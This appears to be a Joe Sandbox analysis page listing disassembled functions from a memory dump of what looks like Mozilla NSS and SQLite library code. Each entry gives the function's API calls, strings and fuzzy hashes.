Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: 633c1ba431b72b0aa65858e9fa9ec90ee819e8246a0ac6656e76e921a07aaf5a
Instruction ID: b8934263dae8b344cdf727ff8e6db0d7f819564f1354148c2fe416b3f4cd988d
Opcode Fuzzy Hash: 633c1ba431b72b0aa65858e9fa9ec90ee819e8246a0ac6656e76e921a07aaf5a
Instruction Fuzzy Hash: 7E711371B083059BD701CF649D40B6BB3A7AF94358F184A28F9689B650FB31DD888793

Function 6CA0ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CA0EF98

Strings

database corruption, xrefs: 6CA0F48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0F483
%s at line %d of [%.10s], xrefs: 6CA0F492

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 924e21f2ba6ae12a4c2615afaae029c8e91e5ba71fe289830a652a51b8204374
Instruction ID: e982238bbf1b872d582f6e6668864677318865f70877817f7e181d1980b9d90d
Opcode Fuzzy Hash: 924e21f2ba6ae12a4c2615afaae029c8e91e5ba71fe289830a652a51b8204374
Instruction Fuzzy Hash: FD62EF30B042458FEB04CF64E880B9ABBB1BF4935CF18419DD8566BB92D735E8C6CB95

Function 6CAB0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CAB0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAB0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CAB1006
PK11_FreeSymKey.NSS3(?), ref: 6CAB101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAB1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAB103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CAB1048
memcpy.VCRUNTIME140(?,?,?), ref: 6CAB108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAB10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CAB10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CAB112E

Part of subcall function 6CAB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CAB08C4,?,?), ref: 6CAB15B8
Part of subcall function 6CAB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CAB08C4,?,?), ref: 6CAB15C1
Part of subcall function 6CAB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB162E
Part of subcall function 6CAB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB1637

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 9f5ece3bcdc76a9ca2bb6703163c8e8ebf947dbdf04c40b1a02f0e78cfe352f7
Instruction ID: 09c88b400811f65e7692c3dcec9288d425ea0cf51f248bace5675dc1485aa4fd
Opcode Fuzzy Hash: 9f5ece3bcdc76a9ca2bb6703163c8e8ebf947dbdf04c40b1a02f0e78cfe352f7
Instruction Fuzzy Hash: 6971E1B1A002058FDB00CFA5DD85A7AB7F8FF48318F18862DE619A7711E731D998CB91

Function 6CAD6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA81C6F,00000000,00000004,?,?), ref: 6CAD6C3F

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA81C6F,00000000,00000004,?,?), ref: 6CAD6C60
PR_ExplodeTime.NSS3(00000000,6CA81C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA81C6F,00000000,00000004,?,?), ref: 6CAD6C94

Strings

gfff, xrefs: 6CAD6D66
gfff, xrefs: 6CAD6D9C
gfff, xrefs: 6CAD6CFD
gfff, xrefs: 6CAD6CF5
gfff, xrefs: 6CAD6D30

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 315911cc61da9ae5feba869e9541309505160107b9dcb8b8d26524e06fb78e17
Instruction ID: db2a0508d06e09930b20dd03606068f743e1c26de092954e2a514dfd748ea299
Opcode Fuzzy Hash: 315911cc61da9ae5feba869e9541309505160107b9dcb8b8d26524e06fb78e17
Instruction Fuzzy Hash: 4F514A72B016494FC708CDADDC527DEB7DAABA4310F48C23AE442DB785DA38E946C751

Function 6CB50F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CB51027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB510B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB51353

Strings

$, xrefs: 6CB512A0
zeroblob(%d), xrefs: 6CB51223
%lld, xrefs: 6CB5114B
NULL, xrefs: 6CB5119E
'%.*q', xrefs: 6CB51217, 6CB51292
-- , xrefs: 6CB50FF5
%02x, xrefs: 6CB512F6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: e832c71def2930a33bec2b86a4b735fdca83c21fb7698337150980f591eb29b3
Instruction ID: 61c1836ba82b608b29ffc6d0460ad18dc550c432f720b7f49b2c760f8961f771
Opcode Fuzzy Hash: e832c71def2930a33bec2b86a4b735fdca83c21fb7698337150980f591eb29b3
Instruction Fuzzy Hash: 01E1BD75A083809FD700CF18C490A6BBBF5EF85358F88896DE98587B50E771E899CB43

Function 6CB58FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB58FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB590DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB59118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB5915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB591C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB59209

Strings

UUUU, xrefs: 6CB59255
3333, xrefs: 6CB5925E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: afa4d943bf1ffee481d47e96f41025b6394f2457c4bdecf21f3e636f55195ffa
Instruction ID: b91b2a7ba7e0244543adf7d98596736058afbdafbc799b24d392d91ab40ee65d
Opcode Fuzzy Hash: afa4d943bf1ffee481d47e96f41025b6394f2457c4bdecf21f3e636f55195ffa
Instruction Fuzzy Hash: 24A18EB2E001559BDB04CF68CC91BAEB7B9FB48324F4D4139E915A7741E736AC12CBA1

Function 6CA10FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6CA0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA6F9C9,?,6CA6F4DA,6CA6F9C9,?,?,6CA3369A), ref: 6CA0CA7A
Part of subcall function 6CA0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA0CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CA1103E
EnterCriticalSection.KERNEL32(?), ref: 6CA11139
LeaveCriticalSection.KERNEL32(?), ref: 6CA11190
sqlite3_free.NSS3(00000000), ref: 6CA11227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CA1126E
sqlite3_free.NSS3(?), ref: 6CA1127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CA11267
winAccess, xrefs: 6CA1129B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: 4435928ffbc15fc8ad4ee3616a854dc1f881d5f3b320ff2c92c06f71bfabe34c
Instruction ID: 33d158b01c3cf888e045a25dfd224965bb613db5f515ef44501321c4cdf597e3
Opcode Fuzzy Hash: 4435928ffbc15fc8ad4ee3616a854dc1f881d5f3b320ff2c92c06f71bfabe34c
Instruction Fuzzy Hash: 57712A317082419BEB049F64DC95A7E737AEB96364F18063DEA1687E80DB30D985CB92

Function 6CA1AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB3CF46,?,6CA0CDBD,?,6CB3BF31,?,?,?,?,?,?,?), ref: 6CA1B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB3CF46,?,6CA0CDBD,?,6CB3BF31), ref: 6CA1B090
sqlite3_free.NSS3(?,?,?,?,?,?,6CB3CF46,?,6CA0CDBD,?,6CB3BF31), ref: 6CA1B0A2
CloseHandle.KERNEL32(?,?,6CB3CF46,?,6CA0CDBD,?,6CB3BF31,?,?,?,?,?,?,?,?,?), ref: 6CA1B100
sqlite3_free.NSS3(?,?,00000002,?,6CB3CF46,?,6CA0CDBD,?,6CB3BF31,?,?,?,?,?,?,?), ref: 6CA1B115
sqlite3_free.NSS3(?,?,?,?,?,?,6CB3CF46,?,6CA0CDBD,?,6CB3BF31), ref: 6CA1B12D

Part of subcall function 6CA09EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA1C6FD,?,?,?,?,6CA6F965,00000000), ref: 6CA09F0E
Part of subcall function 6CA09EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CA6F965,00000000), ref: 6CA09F5D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 274f2bbeea0e7c26ff281d3f691659a9e0c6d8b5cff95f2af7486582dcf66f3e
Instruction ID: d2d7849c19fa72477d29f060d1a0eff9895ffb72ab5f9f0e83b801d470a337ce
Opcode Fuzzy Hash: 274f2bbeea0e7c26ff281d3f691659a9e0c6d8b5cff95f2af7486582dcf66f3e
Instruction Fuzzy Hash: 3A91CEB0A082058FDB04DF74D995B6BB7B6FF45348F184A2DE41697B50EB30E988CB51

Function 6CB98D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBE14E4,6CB4CC70), ref: 6CB98D47
PR_GetCurrentThread.NSS3 ref: 6CB98D98

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CB98E7B
htons.WSOCK32(?), ref: 6CB98EDB
PR_GetCurrentThread.NSS3 ref: 6CB98F99
PR_GetCurrentThread.NSS3 ref: 6CB9910A

Strings

%u.%u.%u.%u, xrefs: 6CB98E74

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 938dd1db6c10efe5fb851048c149be0e58fee28e5d3110df7c566e3c760ceac1
Instruction ID: 3d441d414b0d035293842e5f95aaac056c2738c003978e9fee3fd4710a796e7e
Opcode Fuzzy Hash: 938dd1db6c10efe5fb851048c149be0e58fee28e5d3110df7c566e3c760ceac1
Instruction Fuzzy Hash: 88028B31D052E18FDB18CF19C46876ABBB2EF43304F19827ED8965BA91C336D949C791

Function 6CB3A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CB5C3A2,?,?,00000000,00000000), ref: 6CB3A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB3A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3A738

Strings

database corruption, xrefs: 6CB3A6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB3A6CA
%s at line %d of [%.10s], xrefs: 6CB3A6D9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: bf0d2421c2a42151ba27aefd9a58cd3ba08eef00de904ad2b694464f1c2440c4
Instruction ID: 592adddfdbe611d33526fba21b69f30e0a46be3c47c466c987523c03f4433f50
Opcode Fuzzy Hash: bf0d2421c2a42151ba27aefd9a58cd3ba08eef00de904ad2b694464f1c2440c4
Instruction Fuzzy Hash: C491D7717083A18BCB14CF68C490A5AB7E1FF44314F655A6DE899CBB91EB70EC44CB92

Function 6CB168E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6CB168FC
PR_EnterMonitor.NSS3 ref: 6CB16924

Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490AB
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490C9
Part of subcall function 6CB49090: EnterCriticalSection.KERNEL32 ref: 6CB490E5
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB49116
Part of subcall function 6CB49090: LeaveCriticalSection.KERNEL32 ref: 6CB4913F

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

PR_EnterMonitor.NSS3 ref: 6CB1693E
TlsGetValue.KERNEL32 ref: 6CB16977
TlsGetValue.KERNEL32 ref: 6CB169B8
PR_ExitMonitor.NSS3 ref: 6CB16B1E
PR_ExitMonitor.NSS3 ref: 6CB16B39
TlsGetValue.KERNEL32 ref: 6CB16B62

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 6233c3704cd37e117ab0791cb05a1e4d9263301a1a287d90112f190589387bb9
Instruction ID: dbe9147872c22f51f5941c990422f3beeefa76422764cbcef4b371f0d7fe82e2
Opcode Fuzzy Hash: 6233c3704cd37e117ab0791cb05a1e4d9263301a1a287d90112f190589387bb9
Instruction Fuzzy Hash: 86916A74A5C280CBDB50CF6DC4C155E7BB2FB87308B628299D844CBE29D775DA81CB92

Function 6CA1EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

view, xrefs: 6CA1F061, 6CA1F071, 6CA1FAB7
%s %T already exists, xrefs: 6CA1FAC8
sqlite_master, xrefs: 6CA1F0AB, 6CA1F2DA, 6CA1F757, 6CA1F93E
sqlite_temp_master, xrefs: 6CA1F0A6, 6CA1F2D5
table, xrefs: 6CA1F05C, 6CA1FABC, 6CA1FAC7
authorizer malfunction, xrefs: 6CA1F95C, 6CA1F9BF, 6CA1FA5E, 6CA1FA8B
there is already an index named %s, xrefs: 6CA1F9D7
temporary table name must be unqualified, xrefs: 6CA1F734
not authorized, xrefs: 6CA1F957, 6CA1F9BA

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 3639c15995fa8dc79cb603d62e16cb3e8ea8bbfe46ba06707898d4817dfdffc6
Instruction ID: 6257b3a0f8cca0b094e70bdd80d2d1356e2f215081bb92c97bd978e0993f49c4
Opcode Fuzzy Hash: 3639c15995fa8dc79cb603d62e16cb3e8ea8bbfe46ba06707898d4817dfdffc6
Instruction Fuzzy Hash: 2072C770E082858FDB14CF58C884BA9BBF1FF49318F1881ADD9159BB52D775D886CB90

Function 6CAA09A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAA06A0: TlsGetValue.KERNEL32 ref: 6CAA06C2
Part of subcall function 6CAA06A0: EnterCriticalSection.KERNEL32(?), ref: 6CAA06D6
Part of subcall function 6CAA06A0: PR_Unlock.NSS3 ref: 6CAA06EB

memcmp.VCRUNTIME140(00000000,6CA89B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6CA89B8A,00000000,6CA82D6B), ref: 6CAA09D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6CA89B8A,00000000,6CA82D6B), ref: 6CAA09F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CA89B8A,00000000,6CA82D6B), ref: 6CAA0A1C
